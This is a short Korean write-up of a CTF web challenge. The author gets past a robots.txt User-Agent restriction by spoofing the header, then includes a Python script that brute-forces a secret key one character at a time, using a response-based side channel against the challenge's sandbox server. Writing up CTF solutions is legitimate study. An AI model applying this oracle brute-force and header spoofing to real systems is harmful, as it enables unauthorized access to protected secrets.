[세종 CTF/109] 당신은 Robots 입니까?

첫 메인 접속시 로봇이냐고 물어본다.

공격 벡터도 없고 생각좀 하다가 robots.txt가 생각나서 들어가봤다.

SSG_Browser만 접근가능하게끔 되어 있고..

SSG_Browser로 바꿔서 들어가면 위와 같은 인증창이 나오는데 페이지 소스를 본다.

eval코드를 복호화하면 다음과 같은 코드가 나온다.

POST로 값을 보낸다.

a를 보냈을때 리스폰값에 -5가 붙어 있고

4를 넣었을때 -5가 사라진다.

사이드채널어택이나 타이밍 어택으로 보고 코딩시작~

robots.py

# -*- coding: utf8 -*- import requests alphabet = 'abcdefghijklmnopqrstuvwxyz01234567890' answer = [] while True:     find = False     for i in range(0, len(alphabet)):         data = {'a':''.join(answer)+alphabet[i]}         res = requests.post('http://sandbox.smishing.kr:32810/post.php', data=data,headers={'User-Agent':'SSG_Browser'}).content         if res.find('-5') == -1:             answer.append(alphabet[i])             find = True             print ''.join(answer)             break     if find == False: break print 'Key : ' + ''.join(answer) print '----- webdata -----' data = {'a':''.join(answer)} res = requests.post('http://sandbox.smishing.kr:32810/post.php', data=data,headers={'User-Agent':'SSG_Browser'}).content print res

유니코드로 출력해주면 끝.

결론은 앙 주난띠!

Thanks to @이준환, @최인준